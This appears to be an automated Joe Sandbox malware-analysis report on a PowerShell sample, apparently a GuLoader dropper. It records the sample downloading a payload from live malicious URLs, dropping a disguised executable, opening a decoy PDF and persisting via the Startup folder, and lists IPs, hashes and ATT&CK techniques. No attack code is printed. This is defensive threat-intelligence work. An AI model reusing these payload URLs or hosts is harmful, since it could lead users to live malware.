Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 624Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9691Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\iqb3.batCode function: 2_2_00405FE2 FindFirstFileA,FindClose,2_2_00405FE2
Source: C:\Users\Public\iqb3.batCode function: 2_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_0040559E
Source: C:\Users\Public\iqb3.batCode function: 2_2_00402645 FindFirstFileA,2_2_00402645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\iqb3.batAPI call chain: ExitProcess graph end nodegraph_2-4316
Source: C:\Users\Public\iqb3.batAPI call chain: ExitProcess graph end nodegraph_2-4480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.620400615.000002D275472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\iqb3.batCode function: 2_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00406009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\iqb3.bat "C:\Users\Public\iqb3.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\Public\iqb3.batCode function: 2_2_00405D00 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,2_2_00405D00

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Native API		11
Registry Run Keys / Startup Folder		11
Process Injection		131
Masquerading		1
Input Capture		1
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
PowerShell		Boot or Logon Initialization Scripts11
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin Shares1
Clipboard Data		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials3
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync13
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 879709 Sample: zp.ps1 Startdate: 01/06/2023 Architecture: WINDOWS Score: 60 34 Multi AV Scanner detection for submitted file 2->34 7 powershell.exe 17 22 2->7         started        process3 dnsIp4 28 www.bluemaxxlaser.com 203.175.174.69, 49694, 80 SGGS-AS-APSGGSSG Singapore 7->28 30 dld.ae 84.16.234.51, 443, 49693 LEASEWEB-DE-FRA-10DE Germany 7->30 32 www.dld.ae 7->32 22 C:\Users\Public\iqb3.bat, PE32 7->22 dropped 36 Drops PE files to the user root directory 7->36 38 Powershell creates an autostart link 7->38 40 Powershell drops PE file 7->40 12 iqb3.bat 1 38 7->12         started        15 AcroRd32.exe 15 37 7->15         started        17 conhost.exe 7->17         started        file5 signatures6 process7 file8 24 C:\Users\user\AppData\Local\...\System.dll, PE32 12->24 dropped 19 RdrCEF.exe 51 15->19         started        process9 dnsIp10 26 192.168.2.1 unknown unknown 19->26

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
zp.ps111%ReversingLabsWin32.Trojan.Generic
zp.ps119%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\iqb3.bat11%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://www.dld.ae/zp/zp.exe0%Avira URL Cloudsafe
http://jimmac.musichall.czif0%URL Reputationsafe
https://www.dld.ae0%Avira URL Cloudsafe
http://www.microsoft.coP0%Avira URL Cloudsafe
http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
http://www.bluemaxxlaser.comx0%Avira URL Cloudsafe
http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
http://crl.micrp0%Avira URL Cloudsafe
http://www.bluiblmaxxlasiblr.com/rh/List%20of%20riblquiribld%20itiblms%20and%20siblrvicibls.pdf0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dld.ae
84.16.234.51
truefalse
    		unknown
    www.bluemaxxlaser.com
    		203.175.174.69
    		truefalse
      		unknown
      www.dld.ae
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://www.dld.ae/zp/zp.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdffalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.614964683.000002D26D462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.614964683.000002D26D31F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.micrppowershell.exe, 00000000.00000002.621608396.000002D275760000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_Erroriqb3.bat, iqb3.bat, 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, iqb3.bat, 00000002.00000000.492453132.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, iqb3.bat.0.drfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.microsoft.coPpowershell.exe, 00000000.00000002.620400615.000002D275472000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://go.micropowershell.exe, 00000000.00000002.530639507.000002D25ED89000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: safe
              		unknown
              http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.530639507.000002D25E3DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.614964683.000002D26D462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.614964683.000002D26D31F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.bluemaxxlaser.comxpowershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://jimmac.musichall.cziftext-x-generic-template.png.2.drfalse
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErroriqb3.bat, 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, iqb3.bat, 00000002.00000000.492453132.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, iqb3.bat.0.drfalse
                  		high
                  http://www.bluiblmaxxlasiblr.com/rh/List%20of%20riblquiribld%20itiblms%20and%20siblrvicibls.pdfpowershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp, zp.ps1true
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.530639507.000002D25D2B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.dld.aepowershell.exe, 00000000.00000002.530639507.000002D25DCB7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      203.175.174.69
                      		www.bluemaxxlaser.comSingapore
                      		24482SGGS-AS-APSGGSSGfalse
                      84.16.234.51
                      		dld.aeGermany
                      		28753LEASEWEB-DE-FRA-10DEfalse

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:37.1.0 Beryl
                      Analysis ID:879709
                      Start date and time:2023-06-01 12:13:12 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 42s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:zp.ps1
                      Detection:MAL
                      Classification:mal60.winPS1@13/63@3/3
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 84.9% (good quality ratio 83.3%)
                      • Quality average: 87.4%
                      • Quality standard deviation: 22.4%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 59
                      • Number of non-executed functions: 34
                      Cookbook Comments:
                      • Found application associated with file extension: .ps1

                      Warnings

                      • Exclude process from analysis (whitelisted): WMIADAP.exe
                      • Excluded IPs from analysis (whitelisted): 2.21.22.155, 2.21.22.179, 23.36.224.131
                      • Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, a122.dscd.akamai.net, acroipm2.adobe.com
                      • Execution Graph export aborted for target powershell.exe, PID 4792 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:14:18API Interceptor44x Sleep call for process: powershell.exe modified
                      12:14:44API Interceptor3x Sleep call for process: RdrCEF.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      203.175.174.69zpeu.exeGet hashmaliciousGuLoaderBrowse
                      • bluemaxxlaser.com/rh/rheu.bin
                      as.ps1Get hashmaliciousGuLoaderBrowse
                      • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                      84.16.234.51as.ps1Get hashmaliciousGuLoaderBrowse
                        RFQ - Scan36711006.exeGet hashmaliciousAgentTesla, zgRATBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          www.bluemaxxlaser.comas.ps1Get hashmaliciousGuLoaderBrowse
                          • 203.175.174.69

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SGGS-AS-APSGGSSGzpeu.exeGet hashmaliciousGuLoaderBrowse
                          • 203.175.174.69
                          as.ps1Get hashmaliciousGuLoaderBrowse
                          • 203.175.174.69
                          Fe7MaP3DNP.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.10
                          Demon.x86.elfGet hashmaliciousUnknownBrowse
                          • 103.14.247.55
                          tebjuOp0kK.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.35
                          7Hhy4dfkst.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.31
                          5HzazUnnF6.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.75
                          4M3ACl2k2v.elfGet hashmaliciousUnknownBrowse
                          • 103.14.247.47
                          wget.elfGet hashmaliciousUnknownBrowse
                          • 103.14.247.29
                          chB6z5L2GD.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.10
                          86iDRbpkXb.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.72
                          yC34ftIroi.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.68
                          http://singaporeoptometricassociation.com/Get hashmaliciousUnknownBrowse
                          • 203.175.162.79
                          PiuV0y8Fw8.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.49
                          BvZi2Dj3LS.elfGet hashmaliciousMiraiBrowse
                          • 103.14.247.26
                          q44S0kQ3wZ.exeGet hashmaliciousAgentTesla, VidarBrowse
                          • 203.175.174.68
                          SecuriteInfo.com.Win32.PWSX-gen.18409.25600.exeGet hashmaliciousAgentTeslaBrowse
                          • 203.175.168.182
                          #U260e#Ufe0f E-Fax-Invoice.htmGet hashmaliciousHTMLPhisherBrowse
                          • 203.175.162.6
                          https://faxcorporation1.od2.vtiger.com/pages/new_fax_receievedGet hashmaliciousHTMLPhisherBrowse
                          • 203.175.162.6
                          aJF1hL1hAJ.dllGet hashmaliciousWannacryBrowse
                          • 124.6.37.129

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          54328bd36c14bd82ddaa0c04b25ed9adas.ps1Get hashmaliciousGuLoaderBrowse
                          • 84.16.234.51
                          file.exeGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          file.exeGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          Cobro_Juridico_Historial_de_pago.vbsGet hashmaliciousNjrat, PasteDownloaderBrowse
                          • 84.16.234.51
                          PO20230247.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          file.ps1Get hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          main.ps1Get hashmaliciousKDOT TOKEN GRABBERBrowse
                          • 84.16.234.51
                          AEJR1569.jsGet hashmaliciousNetSupport RATBrowse
                          • 84.16.234.51
                          https://docs.google.com/drawings/d/1yyXXrwkMe93YDIykPC-d3JWZ3X37agPJMgGC3eIiv0w/previewGet hashmaliciousHTMLPhisherBrowse
                          • 84.16.234.51
                          npp.8.5.3.Installer.x64342423423423424242423423424.batGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          Pagamento.jsGet hashmaliciousClipboard Hijacker, QuasarBrowse
                          • 84.16.234.51
                          rBillofLading05-25-2023.exeGet hashmaliciousAveMariaBrowse
                          • 84.16.234.51
                          SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          02705399.exeGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          02705399.exeGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          HIOY0568.jsGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          Voucher_Booking_Reservation_Detail_09888846348.vbsGet hashmaliciousAsyncRATBrowse
                          • 84.16.234.51
                          06472899.jsGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          file.jsGet hashmaliciousUnknownBrowse
                          • 84.16.234.51
                          file.jsGet hashmaliciousUnknownBrowse
                          • 84.16.234.51

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dll36819.exe.docGet hashmaliciousGuLoaderBrowse
                            E-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                              E-dekont_pdf.exeGet hashmaliciousUnknownBrowse
                                od2DVGA5N3.exeGet hashmaliciousGuLoaderBrowse
                                  od2DVGA5N3.exeGet hashmaliciousGuLoaderBrowse
                                    Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exeGet hashmaliciousGuLoaderBrowse
                                      Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exeGet hashmaliciousGuLoaderBrowse
                                        file.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          file.exeGet hashmaliciousGuLoaderBrowse
                                            rZiraatBankasiSwiftMesaji_pdf.exeGet hashmaliciousGuLoaderBrowse
                                              rZiraatBankasiSwiftMesaji_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  E-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                    E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      dekont.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                        E-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          dekont.exeGet hashmaliciousGuLoaderBrowse
                                                            E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              E-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                SPL9015280.exeGet hashmaliciousAzorult, GuLoaderBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\Public\iqb3.bat

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):535909
                                                                  Entropy (8bit):6.217350560053726
                                                                  Encrypted:false
                                                                  SSDEEP:12288:Og0GDb777P77oF77PfI7szHhS+K+E7BoIJIuByPe6WZV9buv3mD:GLK9IQyPc396vWD
                                                                  MD5:849ACB6881494898FF4A18A4A0FBDB43
                                                                  SHA1:1D7FE1693E30DEB8EC2D4F2DC04E7C083FD53AB3
                                                                  SHA-256:F069F56E5597954DCE10AFF5FDAEF9D3BA60BF8EBD996793C47193ECAFBA4481
                                                                  SHA-512:B7A75C27FD7AA8BB6384277EDA73479DF6B49C2C61A1CFA8D458809B787FBF46BBE72F44E9599C82CBED99FC11C53C3B59072BEBE37953366932B88AD5DD0ACF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................................................................s.......P...............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...............r..............@....ndata.......@...........................rsrc........P.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):205
                                                                  Entropy (8bit):5.6159222568163845
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuV1+6hyhMktDBiTFJrqzOJkvP5m1:men9YOFLvEWdM9Qw7hYltVi7Z+P41
                                                                  MD5:F1D25C8B80D82A3A940A680ECD959271
                                                                  SHA1:DBF93538057C574963CF184E6F58C53052066639
                                                                  SHA-256:B116FCF397C330F58B70DAB711CA21A0A344B4311CFFBDA438D66415B289179C
                                                                  SHA-512:58022F0C875E5D98B2A17E66B7E60E8966676049DE577D89148BECD29E39570BA36DFB65584057D08C8287A2257D8D5E3B68F0A00DBE50F627908ED12F0F15DA
                                                                  Malicious:false
                                                                  Preview:0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ...D..[/....."#.Dm.A.;..A.A..Eo.........l............d.{v.^.G...d.W.:...P..k%..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):174
                                                                  Entropy (8bit):5.585008140737213
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWVLovoMktKlle98fZe/O+/rkwGhkg4m1:mi9NqEYOFLvEkBovoltp8Be7Ywcr1
                                                                  MD5:2D42354366D6EC6444266B34CC12E0EE
                                                                  SHA1:A950BA16DCD449E66CB7CF58F19F330635122099
                                                                  SHA-256:1C0741BC7591757B61FCE57F2B489A7A2ACF187FEB126B47675200888EACB44D
                                                                  SHA-512:1CDD7EED4522E37B88ABE2863388BA1427C8DC50F10642B8F7DA24AF7B5CB715AE6D8C92FFA962E1C419F3FCE2F6FFAC6E2740A8AF31F7865F5903EDE82FC8FF
                                                                  Malicious:false
                                                                  Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ...,..[/....."#.D...;..A.A..Eo..................1.x.'.vI..*|Z..o...+.4....0..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):5.5884950283359185
                                                                  Encrypted:false
                                                                  SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhudwvgIltdot/RlUoSjGY1:DyeRVFAFjVFAFI/otZlUo6
                                                                  MD5:37661B4EA5B548C7FC4DD85B4D357891
                                                                  SHA1:2617AAD66B01E9F0BBCDB52E8C4729E41724CDB0
                                                                  SHA-256:1D41CEC37A8D20187E7E2FC6083BA87EE939CDC12EA29C10FC2EC018BF1C8DB9
                                                                  SHA-512:D83DB1B6E23EF0456820EF25351603612ED4020208CBA7AC64C73C628018CA975C6BAD6E77E7704EC746CB25F26FEF38728CFC8DCD12AB4BAE7690332EAC3DD5
                                                                  Malicious:false
                                                                  Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .JuB..[/....."#.D..;.;..A.A..Eo........1..........hvDO.N.t@.....n.*...... ....A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0

                                                                  Download File
